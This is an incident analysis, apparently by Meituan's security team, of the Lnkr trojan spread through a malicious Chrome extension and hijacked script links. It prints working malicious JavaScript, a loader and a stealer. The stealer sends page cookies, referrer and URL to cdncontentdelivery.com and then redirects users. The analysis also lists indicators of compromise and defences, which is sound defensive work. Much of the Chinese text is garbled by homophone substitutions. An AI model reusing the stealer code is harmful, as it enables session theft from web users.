导读

本文从黑产攻击方式、木马歹意行为、监控及进攻计划等角度对Lnkr木马进行剖析,此类木马影响范畴较广,攻打手法多样,但国内目前相干的材料却十分稀少,心愿本文的实践经验和总结能对从事相干平安检测的同学有所帮忙。

一、事件概述

2020年10月,美团平安经营平台发现流量中存在歹意JavaScript申请,信息安全部收到告警后立刻开始应急解决,通过对网络环境、拜访日志等进行排查,最终锁定歹意申请由Chrome浏览器装置歹意插件引起,该歹意JavaScript文件会窃取Cookie并强制用户跳转到歹意色情站点、推广链接等,联合美团威逼情报大数据,发现该插件与Lnkr Ad Injector木马特色吻合。

此类木马传播方式多样,会通过浏览器插件、Broken Link Hijacking等形式在页面中植入恶意代码,不仅重大影响用户失常拜访还会窃取用户数据。经追踪剖析发现,多个国内大型互联网站点(Alexa全球排名前600)被感化,影响上亿网民的上网平安,倡议各大平台对本身零碎第三方加载源以及外部终端设备进行查看,防止蒙受此类木马攻打。

二、溯源过程

2.1 平安经营平台收回异样告警

Chrome沙箱监测到歹意JavaScript文件,收回异样告警:

通过告警信息判断根本的攻击行为是:

  1. 用户拜访失常页面;
  2. 页面加载内部JavaScript文件(A):http://s3.amazonaws.com/js-st...;
  3. A加载第二个JavaScript文件(B):http://countsource.cool/18ced...;
  4. B蕴含恶意代码,向近程域名发送Cookie等敏感信息。

2.2 分析攻击门路

依据告警中波及的触发页面、相干网络环境信息,排除流量劫持、XSS攻打等状况,猜想可能的起因为浏览器插件或恶意软件导致。

通过沙箱对问题设施上所有Chrome插件进行剖析,发现一个名为Vysor的Chrome插件代码存在歹意行为,检测后果如下:

{    "call_window_location": {        "info": "get document.location",        "capture": []    },    "call_document_createElement": {        "info": "call document.createElement, create script element",        "capture": [            "create element elementName:FIELDSET",            "create element elementName:FIELDSET",            "create element elementName:FIELDSET",            "create element elementName:FIELDSET",            "create element elementName:FIELDSET",            "create element elementName:INPUT",            "create element elementName:FIELDSET",            "create element elementName:FIELDSET",            "create element elementName:FIELDSET",            "create element elementName:FIELDSET",            "create element elementName:FIELDSET",            "create element elementName:SCRIPT",            "create element elementName:LINK"        ]    },    "call_document_removeChild": {        "info": "call document.removeChild",        "capture": [            "remove element {elementName:fieldset}",            "remove element {elementName:fieldset}",            "remove element {elementName:fieldset}"        ]    },    "set_scriptSrcValue": {        "info": "set script src unsafe value",        "capture": [            "//s3.amazonaws.com/js-static/18ced489204f8ff908.js"        ]    }}

能够看到插件代码创立了script标签,而后将script标签的src属性设置为//s3.amazonaws.com/js-static/18ced489204f8ff908.js

2.3 插件恶意代码剖析

为了进一步钻研该组织木马的特色,咱们对该歹意插件的代码进行了人工剖析。歹意插件的代码量较大,构造凌乱,蕴含大量烦扰代码。

首先恶意代码事后设置了许多无显著意义的字符串,用于结构Payload。

这些字符串通过上面办法的一系列转换最终结构出创立script标签的语句 document'createElement',doctype即为创立进去的script对象。

接下来为script对象的src属性赋值,在addHandler办法中,cl这个参数由elem传递过去,其中蕴含src字符串,通过cl[0].split('>').slice(2, 3)拿到关键字src,tag是上文的doctype变量也就是script对象,在结构src值这部分,能够看到在常量中有一串一部分很像是base64的字符串:

mawaid = '^\\%|PCQxPjwkMT5zM|y5hbWF6b25hd3Mu|?:^[^\\\\]+?:\\%\\.*\t'

恶意代码利用该字符串联合其余预设变量进行一系列转换,最终造成base64后的加载地址PCQxPjwkMT5zMy5hbWF6b25hd3MuY29tPCQxPmpzLXN0YXRpYzwkMT4xOGNlZDQ4OTIwNGY4ZmY5MDguanM:

通过createLinkPseudo办法解base64,通过replace后造成歹意地址//s3.amazonaws.com/js-static/18ced489204f8ff908.js。

s3.amazonaws.com/js-static/18ced489204f8ff908.js的次要目标是加载下一层的歹意Javascript文件(//countsource.cool/18ced489204f8ff908.js),代码如下:

(function(){var a=document.createElement("script");a.src="//countsource.cool/18ced489204f8ff908.js";(document.head||document.documentElement).appendChild(a)})();;

//countsource.cool/18ced489204f8ff908.js文件内容为:

(function () {    function initXMLhttp() {        var xmlhttp;        if (window.XMLHttpRequest) {            xmlhttp = new XMLHttpRequest();        } else {            xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");        }        return xmlhttp;    }    function minAjax(config) {        if (!config.url) {            return;        }        if (!config.type) {            return;        }        if (!config.method) {            config.method = true;        }        if (!config.debugLog) {            config.debugLog = false;        }        var sendString = [],            sendData = config.data;        if (typeof sendData === "string") {            var tmpArr = String.prototype.split.call(sendData, '&');            for (var i = 0, j = tmpArr.length; i < j; i++) {                var datum = tmpArr[i].split('=');                sendString.push(encodeURIComponent(datum[0]) + "=" + encodeURIComponent(datum[1]));            }        } else if (typeof sendData === 'object' && !(sendData instanceof String)) {            for (var k in sendData) {                var datum = sendData[k];                if (Object.prototype.toString.call(datum) == "[object Array]") {                    for (var i = 0, j = datum.length; i < j; i++) {                        sendString.push(encodeURIComponent(k) + "[]=" + encodeURIComponent(datum[i]));                    }                } else {                    sendString.push(encodeURIComponent(k) + "=" + encodeURIComponent(datum));                }            }        }        sendString = sendString.join('&');        if (window.XDomainRequest) {            var xmlhttp = new window.XDomainRequest();            xmlhttp.onload = function () {                if (config.success) {                    config.success(xmlhttp.responseText);                }            };            xmlhttp.open("POST", config.url);            xmlhttp.send(sendString);        } else {            var xmlhttp = initXMLhttp();            xmlhttp.onreadystatechange = function () {                if (xmlhttp.readyState == 4 && xmlhttp.status == 200) {                    if (config.success) {                        config.success(xmlhttp.responseText, xmlhttp.readyState);                    }                } else {}            }            if (config.type == "GET") {                xmlhttp.open("GET", config.url + "?" + sendString, config.method);                xmlhttp.send();            }            if (config.type == "POST") {                xmlhttp.open("POST", config.url, config.method);                xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");                xmlhttp.send(sendString);            }        }    }    dL();    function dL() {        var host = 'http://press.cdncontentdelivery.com/f';        var config = {            url: host + "/stats.php",            type: "POST",            data: {                vbase: document.baseURI,                vhref: location.href,                vref: document.referrer,                k: "Y291bnRzb3VyY2UuY29vbA==",                ck: document.cookie,                t: Math.floor(new Date().getTime() / 1000),                tg: ""            },            success: onSuccessCallback        };        function bl(resp) {            ! function (dr) {                function t() {                    return !!localStorage && localStorage.getItem(a)                }                function e() {                    o(),                        parent.top.window.location.href = c                }                function o() {                    var t = r + i;                    if (localStorage) {                        localStorage.setItem(a, t)                    }                }                function n() {                    if (t()) {                        var o = localStorage && localStorage.getItem(a);                        r > o && e()                    } else e()                }                var a = "MenuIdentifier",                    r = Math.floor((new Date).getTime() / 1e3),                    c = dr,                    i = 86400;                n()            }(resp);        }        function onSuccessCallback(response) {            if (response && response.indexOf('http') > -1) {                bl(response);            }        }        minAjax(config);    }})();

该文件是真正实现歹意行为的代码,这部分代码没有通过混同、加密,也没有退出其余无意义的代码烦扰剖析,能够很清晰地看到其歹意行为:

  1. 获取以后页面Cookie,ck参数;
  2. 获取以后页面Referrer;
  3. 获取以后页面Location;
  4. 应用XMLHttpRequest将获取到的数据发送到http://press.cdncontentdelive...;
  5. 利用onSuccessCallback办法进行跳转。

至此实现了将Cookie发送到远端接管地址,后续通过onSuccessCallback返回内容实现跳转,残缺流程:

2.4 通过已发现的IoC深刻排查

通过上述特色,发现大量与Lnkr木马相干的域名和插件,局部并未呈现在已知的威逼情报中,经进一步剖析发现,挪动终端设备也有触发歹意申请的状况。

除此之外咱们也发现国内多个大型站点在本身援用资源上引入了Lnkr木马,用户如果拜访到这些站点,Cookie信息会被间接发送到远端,存在极高的平安危险。针对站点本身存在歹意资源的这类状况,极有可能是攻击者利用Broken Link Hijacking的攻打手法,对过期域名进行抢注,站点在拜访原有资源时被劫持到歹意资源。

三、总结

3.1 歹意域名

以下列举了此次检测发现的歹意域名:

  1. mirextpro.com
  2. browfileext.com
  3. nextextlink.com
  4. lisegreen.biz
  5. makesure.biz
  6. clipsold.com
  7. comtakelink.xyz
  8. protesidenext.com
  9. promfflinkdev.com
  10. rayanplug.xyz
  11. countsource.cool
  12. blancfox.com
  13. skipush1.bbn.com.cn
  14. donewrork.org
  15. loungesrc.net
  16. higedev.cool
  17. s3.amazonaws.com/cashe-js/
  18. s3.amazonaws.com/js-cache/
  19. s3.amazonaws.com/jsfile/
  20. s3.amazonaws.com/cashe-js/
  21. cdngateway.net(接管Cookie域名)
  22. sslproviders.net (接管Cookie域名)
  23. cdncontentdelivery.com (接管Cookie域名)

3.2 歹意插件

排查到蕴含Lnkr木马特色的歹意插件:

局部歹意插件截图:

四、复盘

Lnkr木马所造成的危害有哪些?

Lnkr木马的外围域名之一cdngateway.net在寰球域名流量排名8900位,从流量起源角度,通过内部网站跳转带来的流量占比总流量的65.48%,可见其攻打范畴极广,受其影响的利用、用户数量也是十分宏大的。

此类木马对外部用户和外部员工拜访同时具备严重危害。

在内部用户方面,如果企业没有严格控制系统第三方资源加载,黑产利用Broken Link Hijacking的攻打手法,以致业务零碎加载资源时被劫持植入恶意代码,将重大影响用户体验、信息安全和企业形象。

从外部员工角度,传统杀软、EDR等终端安全设备并不能很好地辨认出此类歹意插件,攻击者通过流传歹意浏览器插件管制员工浏览器加载近程歹意资源,不仅仅能够用于广告注入,相较于针对浏览器的其余攻击方式,能够达到更稳固,触发面更广的敏感信息窃取、内网探测等,在CSP历史阻断的歹意申请中,咱们也发现除窃取Cookie信息外,也存在恶意代码窃取页面文本信息的状况,这些文本信息在企业外部平台中,极有可能蕴含大量用户,订单等敏感信息。

如何发现此类歹意木马植入?

针对歹意浏览器插件,在检测方面对其代码做动态剖析老本比拟大,触发歹意申请的Payload都是通过大量编码转换、拼接、正则匹配等结构而成、且通过了很多没有实际意义的办法,在动态分析方面,因为Chrome插件代码会调用Chrome后盾API,在惯例沙箱环境中可能会呈现无奈调用API而中途报错退出。剖析中还发现,很多歹意行为须要触发特定事件能力进入到结构歹意Payload流程,如触发chrome.tabs.onUpdated等。

对于浏览器插件平安,能够通过以下形式进行检测及防护:

  • 禁止装置未在Chrome利用商店上线的插件(公司外部开发的插件除外);
  • 对插件manfiest.json文件进行轻量级的排查,manfiest.json文件中申请权限绝对敏感,如Cookie、tabs、webRequest等等;
  • 利用内容安全策略(CSP)对利用页面发动的申请进行拦挡或监控,联合动态与动态分析技术,判断JavaScript文件行为;
  • 利用浏览器沙箱与EDR,定期对浏览器插件进行扫描;
  • 构建网络层的检测能力,发现有歹意申请及时应急解决。

对于业务零碎本身是否加载歹意资源方面:

  • 严格控制系统加载的第三方资源;
  • 通过内容安全策略(CSP)对页面触发的申请进行拦挡或监控。

总结

黑产组织利用此类木马进行歹意引流、窃取用户信息等,给用户拜访带来平安危险,也危害到企业本身形象,在HTTPS场景下,尽管排除了链路上用户拜访被劫持的危险,但用户端拜访环境安全性不定,为确保用户获取的信息牢靠,没有被篡改,依然须要进一步增强防护。心愿本文能给大家带来一些帮忙或者启发。

对于美团信息安全部

招聘信息

目前美团平安团队正在致力打造语言虚拟机—根底服务—下层利用的纵深利用平安体系,急需对研发安全感趣味的同学退出!如果你正好有求职意向且满足以下岗位要求,欢送投递简历至sunny.fang@meituan.com(邮件主题请注明:研发平安专家-城市-美团SRC)。

| 想浏览更多技术文章,请关注美团技术团队(meituantech)官网微信公众号。

| 在公众号菜单栏回复【2019年货】、【2018年货】、【2017年货】、【算法】等关键词,可查看美团技术团队历年技术文章合集。